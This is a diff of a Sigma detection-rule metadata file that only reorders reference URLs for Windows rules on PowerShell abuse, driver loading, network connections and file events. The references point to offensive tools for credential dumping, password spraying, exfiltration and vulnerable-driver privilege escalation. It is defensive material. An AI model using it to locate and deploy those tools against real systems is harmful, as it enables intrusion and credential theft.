@@ -26061,9 +26085,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", "https://twitter.com/oroneequalsone/status/1568432028361830402", - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" ], "tags": [ @@ -26184,8 +26208,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", - "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" ], "tags": [ @@ -26244,8 +26268,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", + "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" ], "tags": [ 
@@ -26311,8 +26335,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" ], "tags": [ @@ -26453,8 +26477,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" ], "tags": [ @@ -26547,8 +26571,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/995111125447577600", "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://twitter.com/pabraeken/status/995111125447577600", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript.yml" ], "tags": [ 
@@ -26689,8 +26713,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", + "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" ], "tags": [ @@ -26724,9 +26748,9 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" ], "tags": [ 
@@ -26816,8 +26840,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", "https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" ], "tags": [ @@ -27019,8 +27043,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", + "https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml" ], "tags": [ @@ -27119,8 +27143,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml" ], 
@@ -27144,10 +27168,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/ScumBots/status/1610626724257046529", - "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0", - "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content", "https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content", + "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content", + "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0", + "https://twitter.com/ScumBots/status/1610626724257046529", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml" ], "tags": [ @@ -27172,8 +27196,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml" ], "tags": [ 
@@ -27263,8 +27287,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml" ], "tags": "No established tags" 
@@ -27326,19 +27350,19 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/HarmJ0y/DAMP", "https://github.com/samratashok/nishang", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/calebstewart/CVE-2021-1675", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", "https://adsecurity.org/?p=2921", "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/HarmJ0y/DAMP", - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" ], "tags": [ @@ -27442,9 +27466,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", "https://www.shellhacks.com/clear-history-powershell/", + "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" ], "tags": [ @@ -27586,8 +27610,8 @@ "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", - "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", + "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml" ], "tags": "No established tags" @@ -27749,8 +27773,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/Arno0x/DNSExfiltrator", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh", + "https://github.com/Arno0x/DNSExfiltrator", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml" ], "tags": [ 
@@ -27877,9 +27901,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_upload.yml" ], "tags": [ @@ -28197,8 +28221,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/995111125447577600", "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://twitter.com/pabraeken/status/995111125447577600", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript_count.yml" ], "tags": [ @@ -28474,9 +28498,9 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", - "https://github.com/denandz/KeeFarce", "https://github.com/GhostPack/KeeThief", + "https://github.com/denandz/KeeFarce", + "https://www.cisa.gov/uscert/ncas/alerts/aa20-259a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_keepass.yml" ], "tags": [ 
@@ -28509,8 +28533,8 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://github.com/mdsecactivebreach/CACTUSTORCH", "https://twitter.com/SBousseaden/status/1090588499517079552", + "https://github.com/mdsecactivebreach/CACTUSTORCH", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml" ], "tags": [ @@ -28568,8 +28592,8 @@ "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io", "Personal research, statistical analysis", + "https://lolbas-project.github.io", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_remote_thread_source.yml" ], "tags": [ @@ -28812,9 +28836,9 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", - "https://github.com/fengjixuchui/gdrv-loader", "https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details", + "https://github.com/fengjixuchui/gdrv-loader", + "https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details", "https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b", "https://twitter.com/malmoeb/status/1551449425842786306", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_gigabyte_driver.yml" 
@@ -28865,18 +28889,18 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/stong/CVE-2020-15368", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://eclypsium.com/2019/11/12/mother-of-all-drivers/", - "https://github.com/namazso/physmem_drivers", + "https://github.com/jbaines-r7/dellicious", + "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", "https://github.com/Chigusa0w0/AsusDriversPrivEscala", - "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37969", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/jbaines-r7/dellicious", + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://eclypsium.com/2019/11/12/mother-of-all-drivers/", + "https://github.com/namazso/physmem_drivers", + "https://github.com/stong/CVE-2020-15368", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers_names.yml" ], "tags": [ 
@@ -28943,8 +28967,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", + "https://github.com/xmrig/xmrig/tree/master/bin/WinRing0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml" ], "tags": [ @@ -28968,8 +28992,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", "https://reqrypt.org/windivert-doc.html", + "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_windivert.yml" ], "tags": [ 
@@ -29011,22 +29035,22 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://github.com/stong/CVE-2020-15368", - "https://github.com/CaledoniaProject/drivers-binaries", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", - "https://github.com/namazso/physmem_drivers", + "https://github.com/jbaines-r7/dellicious", "https://github.com/tandasat/ExploitCapcom", - "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", - "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", - "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", "https://www.rapid7.com/db/modules/exploit/windows/local/razer_zwopenprocess/", - "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://github.com/CaledoniaProject/drivers-binaries", + "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules", - "https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/", - "https://github.com/jbaines-r7/dellicious", + "https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/DRIVER7.md", + "https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=25444", + "https://www.unknowncheats.me/forum/downloads.php?do=file&id=21780", "https://www.unknowncheats.me/forum/anti-cheat-bypass/334557-vulnerable-driver-megathread.html", + "https://github.com/namazso/physmem_drivers", + 
"https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md", + "https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part", + "https://github.com/stong/CVE-2020-15368", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_drivers.yml" ], "tags": [ @@ -29177,8 +29201,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://processhacker.sourceforge.io/", "https://systeminformer.sourceforge.io/", + "https://processhacker.sourceforge.io/", "https://github.com/winsiderss/systeminformer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_process_hacker.yml" ], @@ -29213,8 +29237,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/", "https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details", + "https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_hw_driver.yml" ], "tags": [ @@ -29238,8 +29262,8 @@ "logsource.category": "driver_load", "logsource.product": "windows", "refs": [ - "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", "https://github.com/alfarom256/CVE-2022-3699/", + "https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/driver_load/driver_load_win_vuln_lenovo_driver.yml" ], "tags": [ 
@@ -29309,8 +29333,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/M_haggis/status/900741347035889665", - "https://twitter.com/M_haggis/status/1032799638213066752", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1", + "https://twitter.com/M_haggis/status/1032799638213066752", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_github_com.yml" ], "tags": [ @@ -29352,8 +29376,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", "https://pypi.org/project/scapy/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_python.yml" ], "tags": [ @@ -29751,8 +29775,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", "https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling", + "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_rdp_to_http.yml" ], "tags": [ 
@@ -29856,8 +29880,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.ietf.org/rfc/rfc2821.txt", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://www.ietf.org/rfc/rfc2821.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" ], "tags": [ @@ -29891,9 +29915,9 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/M_haggis/status/900741347035889665", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://twitter.com/M_haggis/status/1032799638213066752", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_binary_susp_com.yml" ], "tags": [ @@ -29926,8 +29950,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://twitter.com/hakluke/status/1587733971814977537/photo/1", "https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent", + "https://twitter.com/hakluke/status/1587733971814977537/photo/1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml" ], "tags": [ @@ -30211,8 +30235,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", "https://ngrok.com/", + "https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_ngrok_io.yml" ], "tags": [ 
@@ -30279,8 +30303,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml" ], "tags": [ @@ -30389,8 +30413,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", "https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb", + "https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml" ], "tags": "No established tags" @@ -30411,8 +30435,8 @@ "logsource.category": "network_connection", "logsource.product": "windows", "refs": [ - "https://megatools.megous.com/", "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://megatools.megous.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_mega_nz.yml" ], "tags": [ @@ -30554,8 +30578,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/binderlabs/DirCreate2System", "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", + "https://github.com/binderlabs/DirCreate2System", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml" ], "tags": [ 
@@ -30581,10 +30605,10 @@ "logsource.product": "windows", "refs": [ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://twitter.com/luc4m/status/1073181154126254080", "https://twitter.com/malwrhunterteam/status/1235135745611960321", "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://twitter.com/luc4m/status/1073181154126254080", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml" ], "tags": [ @@ -30650,8 +30674,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", "https://twitter.com/0gtweet/status/1465282548494487554", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_nppspy.yml" ], "tags": [ 
@@ -30786,11 +30810,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/helpsystems/nanodump", "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", + "https://github.com/helpsystems/nanodump", "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", - "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", "https://www.google.com/search?q=procdump+lsass", + "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" ], "tags": [ @@ -30951,10 +30975,10 @@ "logsource.product": "windows", "refs": [ "https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles", - "https://twitter.com/luc4m/status/1073181154126254080", "https://twitter.com/malwrhunterteam/status/1235135745611960321", "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/", + "https://twitter.com/luc4m/status/1073181154126254080", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml" ], "tags": [ @@ -31286,9 +31310,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/afwu/PrintNightmare", 